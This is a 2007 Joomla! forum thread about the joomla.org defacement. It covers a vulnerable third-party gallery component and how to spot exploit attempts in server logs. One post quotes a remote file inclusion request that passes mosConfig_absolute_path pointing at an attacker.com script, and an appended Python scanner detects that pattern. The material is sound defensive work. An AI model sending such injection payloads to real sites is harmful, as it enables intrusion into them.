Discuss: A long day...

A place to discuss recent announcements made by the Joomla! Core Team. Let's hear what you have to say.
Tonie
Joomla! Ace
Posts: 1585
Joined: Thu Aug 18, 2005 7:13 am

Re: Discuss: A long day...

Post by Tonie » Sun Aug 19, 2007 2:44 pm

Hadn't noticed that, fine with me as well.
Antonie de Wilde - Forum admin

mcsmom
Joomla! Enthusiast
Posts: 239
Joined: Thu Aug 18, 2005 8:43 pm
Location: New York

Re: Discuss: A long day...

Post by mcsmom » Sun Aug 19, 2007 3:17 pm

Thank you so much to everyone who got the sites back up--I know you are all exhausted .... sleep, get some fresh air, enjoy the day.
Read your words before posting and think about how other people will read them. Be polite. Be kind. Be constructive. Say thank you.

CoffeeDaze

Re: Discuss: A long day...

Post by CoffeeDaze » Sun Aug 19, 2007 3:20 pm

Thanks for the official posting!  It's good to know the core is still secure.  My site has been following this issue as well since it began as we run many Joomla sites.  Again, thanks for the response and fast work on resolving the issue.

AmyStephen
Joomla! Guru
Posts: 579
Joined: Wed Nov 22, 2006 3:35 pm
Location: Nebraska

Re: Discuss: A long day...

Post by AmyStephen » Sun Aug 19, 2007 6:16 pm

Louis -

I do appreciate all that you and Rob and the others have done to diagnose and resolve this problem. I respect the transparency in which you described Joomla! org's mistakes and the maturity that comes from accepting responsibility. I am so relieved that this turned out to be a vulnerability within a component not distributed to others. Your commitment and willingness to keep working, in spite of the fact you must have been exhausted, is admired.

But, why, Louis, why cast dispersions on Omaha, Nebraska?

Amy :)
~*~ Joomla!'s Queen of the Blues - Jennifer Marriott ~*~
http://OpenSourceCommunity.org/node/1719/

mcsmom
Joomla! Enthusiast
Posts: 239
Joined: Thu Aug 18, 2005 8:43 pm
Location: New York

Re: Discuss: A long day...

Post by mcsmom » Sun Aug 19, 2007 7:37 pm

You didn't know you had celebrities in town, did you? They were avoiding the paparazzi. :)
Read your words before posting and think about how other people will read them. Be polite. Be kind. Be constructive. Say thank you.

bigodines
Joomla! Apprentice
Posts: 25
Joined: Thu Aug 18, 2005 11:10 am
Location: Brazil

Re: Discuss: A long day...

Post by bigodines » Sun Aug 19, 2007 7:45 pm

great work guys!

let's see the good sides of this situation:
- it wasn't a bug in the joomla's core. ( \o/ )
- we've seen how important it is to turn off register_globals emulation.
- no one else uses the buggy component (or not :D)
- there are many people active in the forums during the weekend :D

lessons learned, now let's get back to our regular lives.
Matheus Mendes  (GMT -3)
http://www.bigodines.com/blog (portuguese)
http://www.joomla.com.br/blog (english)

alledia
Joomla! Intern
Posts: 88
Joined: Tue Jul 18, 2006 3:55 pm

Re: Discuss: A long day...

Post by alledia » Sun Aug 19, 2007 9:27 pm

Again, thank you all for your patience and understanding.


No - thank you, Louis for a very impressive post after a mistake. It was direct, honest and very reassuring.
The web's best Joomla! SEO resources: http://Alledia.com
Affordable, professional Joomla SEO help: http://Alledia.com/joomla-seo-club/

Rogue4ngel
Joomla! Enthusiast
Posts: 199
Joined: Sun Nov 26, 2006 10:46 pm
Location: New York

Re: Discuss: A long day...

Post by Rogue4ngel » Mon Aug 20, 2007 2:05 am

Excellent work gents... get some rest.. you more than deserve it.
If you're not a part of the solution, you're a part of the problem.

rliskey
Joomla! Apprentice
Posts: 9
Joined: Tue Jun 06, 2006 7:41 am
Location: Third planet from Sol

Re: Discuss: A long day...

Post by rliskey » Mon Aug 20, 2007 2:17 am

I say we all chip in and get Louis and Rob a nice ride with dual built-in laptops, redundant servers, 24x7 mobile net access, cappuccino machine, refrigerator, and pro driver.
War Comes Home http://www.warcomeshome.org/
Joomla! Administrator's Security Checklist http://help.joomla.org/component/option ... temid,268/

Waseem Sadiq
Joomla! Apprentice
Posts: 14
Joined: Mon Sep 12, 2005 7:41 pm
Location: Glasgow - Scotland

Re: Discuss: A long day...

Post by Waseem Sadiq » Mon Aug 20, 2007 11:49 am

I for one am not concerned that Joomla.org got hacked - hackers will find ways of hacking almost anything :)

The best thing to have come out of all of this is yet another crystal clear indication of the hard work that guys like Louis and Rob put into Joomla to ensure the highest possible levels of security for the Joomla core and the Joomla.org sites - knowing that these guys are not clock-watchers and are willing to make themselves available for the greater good of the community at any time of night or day certainly fills me with confidence.

Waseem raises a glass to Louis, Rob and the rest of the team that have worked their pants off all weekend to rectify the hacker's attempt to deface Joomla.org
http://www.bulletprooftemplates.com/ - New Joomla 1.5 templates from an old Joomla head
http://s.imp.ly/joomla/ - If you don't know the answer don't be afraid to ask someone who does

jmc
Joomla! Apprentice
Posts: 26
Joined: Thu Aug 18, 2005 9:10 pm

Re: Discuss: A long day...

Post by jmc » Mon Aug 20, 2007 12:02 pm

I say we all chip in and get Louis and Rob a nice ride with dual built-in laptops, redundant servers, 24x7 mobile net access, cappuccino machine, refrigerator, and pro driver.

I'll lend them mine. Also includes rotisserie.
:laugh:

cbh
Joomla! Apprentice
Posts: 9
Joined: Sun Aug 28, 2005 11:20 pm
Location: Toronto, Ontario, Canada

Re: Discuss: A long day...

Post by cbh » Mon Aug 20, 2007 1:52 pm

Agreed. Thank you all for your very hard work on this.

Cheers
Chris Hutcheson

grace
Joomla! Fledgling
Posts: 4
Joined: Wed Sep 14, 2005 5:59 am

Re: Discuss: A long day...

Post by grace » Tue Aug 21, 2007 8:22 am

Hello: I found a lot of strange links trying to hack my site last weekend. First I closed everything, then I did a search for a site name and wrote to the ISP provider, through their website, where the script was.
Unfortunately I received this part of an email:
"we will not be able to resolve this issue by e-mail"
"Our Customer Service Specialists will investigate your inquiry and send you a response
within 1 business day."
1 business day is a paradise for intruders.

So, nobody will be safe on the weekends. The server providers don't have technical personnel.

I'm sorry, for your bad day.
Bye
 

Kiper
Joomla! Fledgling
Posts: 2
Joined: Wed Nov 01, 2006 6:20 pm

Re: Discuss: A long day...

Post by Kiper » Tue Aug 21, 2007 4:01 pm

I hope you have had time to recuperate! Great work as always. Hard to have staff 24/7/365 when you are an Open Source Community.
Hope you are not too exhausted to continue polishing 1.5... :)

You're the best!

buffnerd

Re: Discuss: A long day...

Post by buffnerd » Tue Aug 21, 2007 8:34 pm

It looks like the issue is with expose picture gallery.  See the discussion here: http://www.gotgtek.com/forum/index.php?topic=1315.0

Our site: http://bcProject.info has expose installed and the hackers defaced our site using a vulnerability within expose.  There's a script in the component allowing for the uploading of background images.  It was exploited to allow an attacker to upload files to the site.

Hope that resolves the mystery of "why other sites were hacked the same day".

cheers...

AmyStephen
Joomla! Guru
Posts: 579
Joined: Wed Nov 22, 2006 3:35 pm
Location: Nebraska

Re: Discuss: A long day...

Post by AmyStephen » Tue Aug 21, 2007 8:48 pm

Buffnerd -

Please post this type of information in the Security Section. In the link you provided, someone is linking to JoomlaCode for the current version. So, maybe those who have not upgraded are vulnerable. But, it needs to be shared in the Security forum so that it can be reviewed.

I do not believe there have been many reports of sites cracked. But, reporting the specifics is helpful in the security forum. Many people have enabled "notify" on that forum to receive all security reports. Also, if there really is a "mass attack" the Joomla! forum can collect good information to share with the rest of the community. This is even more important if a specific third party extension is suspected - there are places that type of information is recorded so that others can receive such information immediately and so a historical record is maintained.

Thanks!
Amy
~*~ Joomla!'s Queen of the Blues - Jennifer Marriott ~*~
http://OpenSourceCommunity.org/node/1719/

cozimek
Joomla! Enthusiast
Posts: 137
Joined: Thu Aug 18, 2005 1:27 pm
Location: Washington, DC

Re: Discuss: A long day...

Post by cozimek » Tue Aug 21, 2007 9:42 pm

From my vantage here, I want to thank Rob for responding to my text message so early in the morning and then the rest of the core for rocking and rolling for the next 24 hours.  Amazing work folks.  Hats off to everyone that contributed their precious weekends with families to the Joomla! community.

Best,
Ryan
PICnet - "Empowering the missions of non-profits through technology"
www.picnet.net

Habbekrats
Joomla! Apprentice
Posts: 7
Joined: Thu Dec 29, 2005 7:15 pm

Re: Discuss: A long day...

Post by Habbekrats » Tue Aug 21, 2007 10:19 pm

First of all, will some kids end up in a Turkish Jail because they had a bit of fun with some sloppy site management? It happens. Get over it  and no Turkish police, thank you. Some Midnight Express, anyone?

Secondly, wakie wakie, eggs and bakie.  :pop
What if then else?

Solitary_God
Joomla! Fledgling
Posts: 3
Joined: Thu Jun 21, 2007 9:36 pm
Location: Oklahoma

Re: Discuss: A long day...

Post by Solitary_God » Thu Aug 23, 2007 4:54 am

Interesting, I'm glad this was a problem with a non-publicly released component. I'm really really new to Joomla, but I am an info security student who is also just now getting into web development. Just chance that I found Joomla (which btw is THE best!) and chose it for learning more about web dev, PHP and MySQL.

I have read the security warnings (forum/FAQ) for Joomla and have taken these steps on my 2 dev. projects, BUT that really only goes so far. New people, myself included, can read till their eyes bulge from too much coffee and eye strain... but if they don't "know" how to recognize attack attempts, be it MySQL injection or strange requests.... how are we to know besides the infamous

((This site has been defaced by some camel humping idiot)) "sorry camels"

Can someone maybe post an article explaining how to recognize common signs of exploits, how to recognize them in logs, searches, post/get request, etc.

I know it's largely an Apache/MySQL subject, but I think a lot of these attacks could be prevented with a little more Joomla specific education.

I'd imagine most Joomla users wouldn't know where to start, or what to check for regularly (I get lost). I think this would make serious users more aware and would in the long run help you all (dev team).

Just a suggestion, feasible?

romit
Joomla! Apprentice
Posts: 35
Joined: Tue Nov 22, 2005 5:39 pm
Location: Calcutta - India

Re: Discuss: A long day...

Post by romit » Fri Aug 24, 2007 3:15 pm

Solitary_God wrote:
Can someone maybe post an article explaining how to recognize common signs of exploits, how to recognize them in logs, searches, post/get request, etc.



For a start, You can search the logs for the text

Code:

index.php?mosConfig_absolute_path=
as Rob mentions here
Romit Chatterjee
× Joomla! Web Developer - http://www.RomitChat.com
× IndicJoomla! Translation Coordinator - http://www.JoomlaIndia.org/bengali/

HH
Joomla! Apprentice
Posts: 18
Joined: Fri Dec 29, 2006 11:57 pm

Re: Discuss: A long day...

Post by HH » Fri Aug 24, 2007 6:16 pm

Thanks a lot guys for the good job.

I've one addition to this
romit wrote:
Solitary_God wrote:
Can someone maybe post an article explaining how to recognize common signs of exploits, how to recognize them in logs, searches, post/get request, etc.



For a start, You can search the logs for the text

Code:

index.php?mosConfig_absolute_path=
as Rob mentions here


The request may be accompanied by a 403 error message. For example, the logs of the server may show the following:

Code:

[date/time] "GET index.php?mosConfig_absolute_path==http://www.attacker.com/script.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.807" 101.131.131.101 - -


Of course, parameters differ according to the website's path + attacker's script.
Last edited by HH on Fri Aug 24, 2007 6:17 pm, edited 1 time in total.

Solitary_God
Joomla! Fledgling
Posts: 3
Joined: Thu Jun 21, 2007 9:36 pm
Location: Oklahoma

Re: Discuss: A long day...

Post by Solitary_God » Fri Aug 24, 2007 7:11 pm

Ok, I can understand that. I'm a day or 2 from releasing a development project which I myself will be hosting, so I want to get a good understanding of how to recognize exploit attempts outside of firewall logs. Good to know what to look for in logs. Thanks again for your time!

RobS
Joomla! Enthusiast
Posts: 102
Joined: Mon Dec 05, 2005 10:17 am
Location: New Orleans, LA, USA

Re: Discuss: A long day...

Post by RobS » Fri Aug 24, 2007 7:45 pm

Joomla! 1.0.11+ have come with some mod_rewrite rules at the end of the htaccess.txt file that examine URLs for known exploit attempts.  I would recommend having a look at those rules for some ideas on what to look for in log files.  Also, use the script.  That is what is causing the 403 error that HH described.
Rob Schley - Joomla! Core Team
WebImagery - http://www.webimagery.net/
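
The log check romit and HH describe, extended to percent-encoded requests and to the 403 status RobS explains, as an added example that is not part of any post in this thread. The function names, the `review` label and the sample lines are assumptions constructed for illustration; the regex expects an access log that records the quoted request line followed by the status code.

```python
import re
from urllib.parse import unquote

# Request line plus status code; tolerant of whatever surrounds them in the line.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A client-supplied mosConfig_* variable in the decoded query string.
MOSCONFIG_RE = re.compile(r'(?:^|[&;])(?P<name>mosConfig_\w+)=+(?P<value>[^&;]*)')
# A value that points at another host, as in the sample line HH posted.
REMOTE_RE = re.compile(r'(?:https?|ftp)://', re.I)


def classify(line):
    """Return None for unrelated lines, else a dict describing the request."""
    req = REQUEST_RE.search(line)
    if req is None:
        return None
    query = req.group("target").partition("?")[2]
    # Decode twice so %3D and double-encoded (%253D) forms are matched too.
    hit = MOSCONFIG_RE.search(unquote(unquote(query)))
    if hit is None:
        return None
    status = int(req.group("status"))
    return {
        "param": hit.group("name"),
        "remote_value": bool(REMOTE_RE.match(hit.group("value"))),
        "status": status,
        # 403 means the server refused the request; any other status was
        # not refused, so that request and its response need a manual look.
        "verdict": "blocked" if status == 403 else "review",
    }


def scan(lines):
    """Yield (line_number, finding) for each line carrying the indicator."""
    for number, line in enumerate(lines, start=1):
        finding = classify(line)
        if finding:
            yield number, finding


# Constructed sample lines (documentation addresses and hostnames only).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Aug/2007:18:01:02 +0000] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Aug/2007:18:03:44 +0000] "GET /index.php?mosConfig_absolute_path=http://files.example.invalid/s.txt? HTTP/1.1" 403 -',
    '198.51.100.7 - - [24/Aug/2007:18:03:45 +0000] "GET /index.php?option=com_x&mosConfig%5Fabsolute%5Fpath%3Dhttp%3A%2F%2Ffiles.example.invalid%2Fs.txt HTTP/1.1" 200 312',
    '[date/time] "GET index.php?mosConfig_live_site==x HTTP/1.1" 403 - "-" "-" 203.0.113.5 - -',
]

for number, finding in scan(SAMPLE_LOG):
    print(number, finding)
```

A plain text search for `mosConfig_absolute_path=` misses the third sample line, because the parameter name and the `=` are percent-encoded there; decoding before matching catches it.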

